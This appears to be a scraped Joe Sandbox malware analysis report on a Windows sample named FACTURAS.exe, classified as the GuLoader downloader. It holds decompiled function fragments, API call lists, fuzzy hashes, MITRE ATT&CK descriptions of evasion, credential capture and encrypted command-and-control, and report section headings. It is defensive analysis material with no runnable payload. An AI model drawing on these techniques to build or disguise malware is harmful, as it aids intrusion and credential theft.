				_v36 = _v36 & 0x00000000;
				L00401672();
				_push(0x4202c9);
				L0040165A();
				L0040165A();
				return _t37;
			}

0x00420210
0x0042021f
0x00420229
0x00420231
0x00420234
0x0042023b
0x0042024a
0x00420253
0x00420264
0x0042026a
0x0042026c
0x00420273
0x0042028f
0x00420275
0x00420275
0x0042027a
0x0042027f
0x00420282
0x00420285
0x0042028a
0x0042028a
0x00420293
0x00420296
0x00420299
0x004202a3
0x004202a8
0x004202bb
0x004202c3
0x004202c8

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 00420229
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 00420253
__vbaHresultCheckObj.MSVBVM60(00000000,00401338,00402958,000000A8), ref: 00420285
__vbaStrMove.MSVBVM60 ref: 004202A3
__vbaFreeStr.MSVBVM60(004202C9), ref: 004202BB
__vbaFreeStr.MSVBVM60(004202C9), ref: 004202C3

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultMove
String ID:
API String ID: 1421114154-0
Opcode ID: 35ede378ceed68ec91170eecf531bef699392269e34ffe866bb2f51563c4929a
Instruction ID: 355fb60279d8f19361eea665e3a7ed9cb3406699ced1e51f619526db72a87191
Opcode Fuzzy Hash: 35ede378ceed68ec91170eecf531bef699392269e34ffe866bb2f51563c4929a
Instruction Fuzzy Hash: A9110370A00219EFCB00EF94D95AFEDBBB4BF18704F50846AF405B72A1D77999458B98

Uniqueness

Uniqueness Score: -1.00%

Function 00420D3B, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420D41

Part of subcall function 00420E2A: __vbaChkstk.MSVBVM60(?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420E30

__vbaErrorOverflow.MSVBVM60(?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420D7F
__vbaChkstk.MSVBVM60(?,0041D72C), ref: 00420D8A
#644.MSVBVM60(?,?,0041D72C), ref: 00420DB4

Part of subcall function 00420E91: __vbaChkstk.MSVBVM60(?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420E97

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Chkstk$#644ErrorOverflow
String ID:
API String ID: 436640012-0
Opcode ID: 2f4ff53383ec935e42d0731882e56748ee50094e4fee32641a625a2e9d3bc387
Instruction ID: 4f11a9a09a545f0d78c4ebc785adf61c7ad3ee6e355b3f05b25a2318d456f59f
Opcode Fuzzy Hash: 2f4ff53383ec935e42d0731882e56748ee50094e4fee32641a625a2e9d3bc387
Instruction Fuzzy Hash: 9601DF34701605B9CB24BB71AD0269D7B789F05744F50446BFA04EF272D6749982D75C

Uniqueness

Uniqueness Score: -1.00%

Function 00420F3C, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,?,?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420F42
__vbaI2I4.MSVBVM60(?,?,?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420F6E
__vbaI2I4.MSVBVM60(?,00000000,?,?,?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?), ref: 00420F8E

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Chkstk
String ID:
API String ID: 2065706432-0
Opcode ID: fae711df732b7a88d7ac4454cdcb6b2b582d435faac1cd43dfafb5f7c10e9be9
Instruction ID: 9c07cafcc63b710958112b52d71418ce7e2bc0d7fd3ef08fbe5a3cf741cecfc0
Opcode Fuzzy Hash: fae711df732b7a88d7ac4454cdcb6b2b582d435faac1cd43dfafb5f7c10e9be9
Instruction Fuzzy Hash: 3FF0A7312005086BDF14EB69CC43B5E37F59F00754F10823AB954DB3A1CA7CE910971C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FACTURAS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: FACTURAS.exe PID: 6492 Parent PID: 5852

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: FACTURAS.exe PID: 6492 Parent PID: 5852 FACTURAS.exeCOMMON

Execution Graph

Function 0306D940, Relevance: 13.1, APIs: 1, Strings: 6, Instructions: 894
memorynativeCOMMON

Function 03076B17, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176
COMMON

Function 0306DB52, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167
memorynativeCOMMON

Function 0306DC8C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
memorynativeCOMMON

Function 0306DB0E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125
memorynativeCOMMON

Function 0306DE06, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99
memorynativeCOMMON

Function 0041E02C, Relevance: 498.6, APIs: 255, Strings: 29, Instructions: 1650
COMMON

Function 0041C944, Relevance: 263.4, APIs: 125, Strings: 25, Instructions: 884
COMMON

Function 004202E8, Relevance: 249.2, APIs: 123, Strings: 19, Instructions: 696
COMMON

Function 004025B4, Relevance: 15.1, APIs: 10, Instructions: 103
COMMON

Function 00401698, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
COMMON